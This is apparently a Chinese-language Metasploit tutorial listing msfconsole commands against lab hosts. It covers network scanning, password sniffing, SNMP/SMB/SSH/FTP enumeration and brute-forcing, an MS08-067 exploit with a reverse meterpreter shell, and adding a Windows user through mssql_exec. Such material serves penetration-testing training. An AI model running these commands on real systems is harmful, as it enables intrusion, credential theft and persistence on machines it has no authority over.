1. db_nmap
-
跟 nmap 用法一样,结果存放在 msf 的数据库中
msf > db_nmap -sV 192.168.6.0/24
2. 主机发现扫描
- use auxiliary/scanner/discovery/arp_sweep
-
set INTERFACE、RHOSTS、SHOST、SMAC、THREADS;run
msf > search arp msf > use auxiliary/scanner/discovery/arp_sweep msf auxiliary(scanner/discovery/arp_sweep) > show options msf auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.6.0/24 msf auxiliary(scanner/discovery/arp_sweep) > set INTERFACE eth0 msf auxiliary(scanner/discovery/arp_sweep) > set THREADS 20 msf auxiliary(scanner/discovery/arp_sweep) > run
3. 端口扫描
- use auxiliary/scanner/portscan/syn
-
set INTERFACE、PORTS、RHOSTS、THREADS;run
msf > search portscan msf > use auxiliary/scanner/portscan/syn msf auxiliary(scanner/portscan/syn) > show options msf auxiliary(scanner/portscan/syn) > set INTERFACE eth0 msf auxiliary(scanner/portscan/syn) > set PORTS 80 msf auxiliary(scanner/portscan/syn) > set RHOSTS 10.10.10.0/24 msf auxiliary(scanner/portscan/syn) > set THREADS 50 msf auxiliary(scanner/portscan/syn) > run
4. 僵尸扫描
-
查找 ipidseq 主机(查找僵尸机)
- use auxiliary/scanner/ip/ipidseq
- set RHOSTS 192.168.1.0/24 ;run
- nmap -PN -sI 10.10.10.147 10.10.10.132
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(scanner/ip/ipidseq) > show options
msf auxiliary(scanner/ip/ipidseq) > set RHOSTS 10.10.10.100-150
msf auxiliary(scanner/ip/ipidseq) > set THREADS 20
msf auxiliary(scanner/ip/ipidseq) > run
5. UDP 扫描
- use auxiliary/scanner/discovery/udp_sweep
msf > use auxiliary/scanner/discovery/udp_sweep
msf auxiliary(scanner/discovery/udp_sweep) > show options
msf auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 10.10.10.100-150
msf auxiliary(scanner/discovery/udp_sweep) > run
- use auxiliary/scanner/discovery/udp_probe
msf > use auxiliary/scanner/discovery/udp_probe
msf auxiliary(scanner/discovery/udp_probe) > show options
msf auxiliary(scanner/discovery/udp_probe) > set RHOSTS 10.10.10.100-150
msf auxiliary(scanner/discovery/udp_probe) > set CHOST 10.10.10.131
msf auxiliary(scanner/discovery/udp_probe) > set THREADS 20
msf auxiliary(scanner/discovery/udp_probe) > run
6. 密码嗅探
- use auxiliary/sniffer/psnuffle
- 支持从 pacap 抓包文件中提取密码
- 功能类似于 dsniff
-
目前只支持 pop3、imap、ftp、HTTP GET 协议
msf > search sniffer msf > use auxiliary/sniffer/psnuffle msf auxiliary(sniffer/psnuffle) > show options msf auxiliary(sniffer/psnuffle) > set INTERFACE eth0 msf auxiliary(sniffer/psnuffle) > runroot@kali:~# ftp 10.10.10.148
# 继续上述 msf auxiliary(sniffer/psnuffle) > show options msf auxiliary(sniffer/psnuffle) > set PCAPFILE /root/ftp.pcapng msf auxiliary(sniffer/psnuffle) > jobs msf auxiliary(sniffer/psnuffle) > kill 0 msf auxiliary(sniffer/psnuffle) > run
7. SNMP 扫描
- vim /etc/snmp/snmpd.conf (侦听复制修改为 0.0.0.0:161)
- use auxiliary/scanner/snmp/snmp_login
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(scanner/snmp/snmp_login) > show options
msf auxiliary(scanner/snmp/snmp_login) > set RHOSTS 10.10.10.149
msf auxiliary(scanner/snmp/snmp_login) > set THREADS 20
msf auxiliary(scanner/snmp/snmp_login) > run
- use auxiliary/scanner/snmp/snmp_enum
msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(scanner/snmp/snmp_enum) > show options
msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.10.149
msf auxiliary(scanner/snmp/snmp_enum) > run
- use auxiliary/scanner/snmp/snmp_enumusers (windows)
msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(scanner/snmp/snmp_enum) > show options
msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.10.142 (windows)
msf auxiliary(scanner/snmp/snmp_enum) > run
msf auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY jlcssadmin (SNMP 服务器团体名)
msf auxiliary(scanner/snmp/snmp_enum) > set THREADS 20
msf auxiliary(scanner/snmp/snmp_enum) > run
- use auxiliary/scanner/snmp/snmp_enumshares (windows)
msf > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(scanner/snmp/snmp_enumusers) > show options
msf auxiliary(scanner/snmp/snmp_enumusers) > set COMMUNITY jlcssadmin
msf auxiliary(scanner/snmp/snmp_enumusers) > set RHOSTS 10.10.10.142
msf auxiliary(scanner/snmp/snmp_enumusers) > run
8. SMB 扫描
-
SMB 版本扫描
- use auxiliary/scanner/smb/smb_version
-
扫描命令管道。判断 SMB 服务类型(账号、密码)
- use auxiliary/scanner/smb/pipe_auditor
-
扫描通过 SMB 管道可以访问的 RCERPC 服务
- use auxiliary/scanner/smb/pipe_dcerpc_auditor
-
SMB 共享账号(账号、密码)
- use auxiliary/scanner/smb/smb_enumshares
-
SMB 用户枚举(账号、密码)
- use auxiliary/scanner/smb/smb_enumusers
-
SID 枚举(账号、密码)
- use auxiliary/scanner/smb/smb_lookupsid
-
SMB 版本扫描
# 继续上述 msf auxiliary(scanner/smb/smb_version) > set SMBUSER Administrator msf auxiliary(scanner/smb/smb_version) > set SMBPass 123456 msf auxiliary(scanner/smb/smb_version) > run
-
扫描命令管道。判断 SMB 服务类型(账号、密码)
msf > use auxiliary/scanner/smb/pipe_auditor msf auxiliary(scanner/smb/pipe_auditor) > show options msf auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 10.10.10.148 msf auxiliary(scanner/smb/pipe_auditor) > run
# 继续上述 msf auxiliary(scanner/smb/pipe_auditor) > set SMBUser Administrator msf auxiliary(scanner/smb/pipe_auditor) > set SMBPass 123456
-
扫描通过 SMB 管道可以访问的 RCERPC 服务
msf > use auxiliary/scanner/smb/pipe_dcerpc_auditor msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > show options msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set RHOSTS 10.10.10.148 msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > run
# 继续上述 msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set SMBUser Administrator msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set SMBPass 123456 msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > run
-
SMB 共享账号(账号、密码)
msf > use auxiliary/scanner/smb/smb_enumshares msf auxiliary(scanner/smb/smb_enumshares) > show options msf auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 10.10.10.148 msf auxiliary(scanner/smb/smb_enumshares) > run
# 继续上述 msf auxiliary(scanner/smb/smb_enumshares) > set SMBUser Administrator msf auxiliary(scanner/smb/smb_enumshares) > set SMBPass 123456 msf auxiliary(scanner/smb/smb_enumshares) > run
-
SMB 用户枚举(账号、密码)
msf > use auxiliary/scanner/smb/smb_enumusers msf auxiliary(scanner/smb/smb_enumusers) > show options msf auxiliary(scanner/smb/smb_enumusers) > set RHOSTS 10.10.10.148 msf auxiliary(scanner/smb/smb_enumusers) > run
# 继续上述 msf auxiliary(scanner/smb/smb_enumusers) > set SMBUser Administrator msf auxiliary(scanner/smb/smb_enumusers) > set SMBPass 123456 msf auxiliary(scanner/smb/smb_enumusers) > run
-
SID 枚举(账号、密码)
msf > use auxiliary/scanner/smb/smb_lookupsid msf auxiliary(scanner/smb/smb_lookupsid) > show options msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 10.10.10.148
# 继续上述 msf auxiliary(scanner/smb/smb_lookupsid) > set SMBUser Administrator msf auxiliary(scanner/smb/smb_lookupsid) > set SMBPass 123456 msf auxiliary(scanner/smb/smb_lookupsid) > run
9. SSH 扫描
-
SSH 版本扫描
- use auxiliary/scanner/ssh/ssh_version
-
SSH 密码爆破
- use auxiliary/scanner/ssh/ssh_login
- set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt ;set VERBOSE false ;run
- use auxiliary/scanner/ssh/ssh_login
-
SSH 公钥登陆
- use auxiliary/scanner/ssh/ssh_login_pubkey
- set KEY_FILE id_rsa;set USERNAME root ;run
- use auxiliary/scanner/ssh/ssh_login_pubkey
-
SSH 版本扫描
msf > use auxiliary/scanner/ssh/ssh_version msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 10.10.10.132 msf auxiliary(scanner/ssh/ssh_version) > run
-
SSH 密码爆破
root@kali:~# more /usr/share/metasploit-framework/data/wordlists/root_userpass.txt msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.10.132 msf auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt msf auxiliary(scanner/ssh/ssh_login) > set VERBOSE false msf auxiliary(scanner/ssh/ssh_login) > run
-
SSH 公钥登陆
msf > use auxiliary/scanner/ssh/ssh_login_pubkey msf auxiliary(scanner/ssh/ssh_login_pubkey) > set RHOSTS 10.10.10.132 msf auxiliary(scanner/ssh/ssh_login_pubkey) > set USERNAME root msf auxiliary(scanner/ssh/ssh_login_pubkey) > set KEY_PATH id_rsa_test_file
10. windows 缺少的补丁
- 基于已经取得的 session 进行检测
-
use post/windows/gather/enum_patches
- show advanced
- set VERBOSE yes
-
检查失败
- known bug in WMI query, try migrating to another process
- 迁移到另一个进程再次进行尝试
-
ms08-067
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(windows/smb/ms08_067_netapi) > set RHOST 10.10.10.147 msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp msf exploit(windows/smb/ms08_067_netapi) > run
meterpreter > backgroun msf exploit(windows/smb/ms08_067_netapi) > sessions
msf exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/enum_patches msf post(windows/gather/enum_patches) > set SESSION 4 msf post(windows/gather/enum_patches) > run
# 进程错误,迁移进程 msf post(windows/gather/enum_patches) > sessions -i 4 meterpreter > getpid meterpreter > ps meterpreter > migrate 828 # spoolsv.exe meterpreter > background msf post(windows/gather/enum_patches) > run
11. mssql 扫描
-
mssql 扫描端口
- TCP 1422(动态端口)/ UDP 1434 (查询 TCP 端口号)
- use auxiliary/scanner/mssql/mssql_ping
-
爆破 mssql 密码
- use auxiliary/scanner/mssql/mssql_login
-
远程执行代码(获取数据库权限之后)
- use auxiliary/admin/mssql/mssql_exec
- set CMD net user user1 pass123 /ADD
-
mssql 扫描端口
msf > use auxiliary/scanner/mssql/mssql_ping msf auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 10.10.10.142 msf auxiliary(scanner/mssql/mssql_ping) > run
12. FTP 扫描
-
ftp 版本扫描
- use auxiliary/scanner/ftp/ftp_version
- use auxiliary/scanner/ftp/anonymous
- use auxiliary/scanner/ftp/ftp_login
-
use auxiliary/scanner/ [tab]
- Display all 479 possibilities? (y or n)
-
查询版本信息
msf > use auxiliary/scanner/ftp/ftp_version msf auxiliary(scanner/ftp/ftp_version) > set RHOSTS 10.10.10.132 msf auxiliary(scanner/ftp/ftp_version) > run
-
是否允许匿名登录
msf > use auxiliary/scanner/ftp/anonymous msf auxiliary(scanner/ftp/anonymous) > set RHOSTS 10.10.10.132 msf auxiliary(scanner/ftp/anonymous) > run
-
暴力破解
use auxiliary/scanner/ftp/ftp_login
